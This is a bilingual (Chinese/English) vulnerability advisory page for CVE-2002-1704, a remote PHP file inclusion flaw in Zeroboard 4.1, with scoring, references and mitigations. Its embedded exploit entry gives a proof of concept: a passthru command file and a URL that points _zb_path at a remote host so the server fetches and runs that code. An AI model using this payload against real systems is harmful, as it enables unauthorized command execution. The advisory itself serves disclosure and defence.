CVE-2002-1704
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:18
NMCOE    

[原文]Zeroboard 4.1, when the "allow_url_fopen" and "register_globals" variables are enabled, allows remote attackers to execute arbitrary PHP code by modifying the _zb_path parameter to reference a URL on a remote web server that contains the code.


[CNNVD]Zeroboard PHP包含文件任意命令执行漏洞(CNNVD-200212-323)

        
        Zeroboard是一款韩国的PHP WEB论坛程序。
        Zeroboard中的_head.php脚本对用户输入缺少正确检查和过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        当php.ini配置文件中设置"allow_url_fopen"变量,"register_globals"变量为"on"时,由于_head.php对输入过滤不够充分,攻击者可以通过_head.php脚本装载远程主机上的PHP文件,如果远程PHP文件包含恶意PHP代码,可导致以WEB进程在系统上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1704
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-323
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/9366
(UNKNOWN)  XF  zeroboard-include-remote-file(9366)
http://www.securityfocus.com/bid/5028
(UNKNOWN)  BID  5028

- 漏洞信息

Zeroboard PHP包含文件任意命令执行漏洞
中危 输入验证
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Zeroboard是一款韩国的PHP WEB论坛程序。
        Zeroboard中的_head.php脚本对用户输入缺少正确检查和过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        当php.ini配置文件中设置"allow_url_fopen"变量,"register_globals"变量为"on"时,由于_head.php对输入过滤不够充分,攻击者可以通过_head.php脚本装载远程主机上的PHP文件,如果远程PHP文件包含恶意PHP代码,可导致以WEB进程在系统上执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 修改程序,严格判断用户输入的变量。
        * 修改php.ini设置,设置allow_url_fopen = Off
        厂商补丁:
        Zeroboard
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.zeroboard.com/

- 漏洞信息 (21557)

Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability (EDBID:21557)
php webapps
2002-06-15 Verified
0 onlooker
N/A [点击下载]
source: http://www.securityfocus.com/bid/5028/info

Zeroboard is a PHP web board package available for the Linux and Unix platforms.

Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script. 

PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

		

- 漏洞信息

21563
ZeroBoard _zb_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-06-16 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站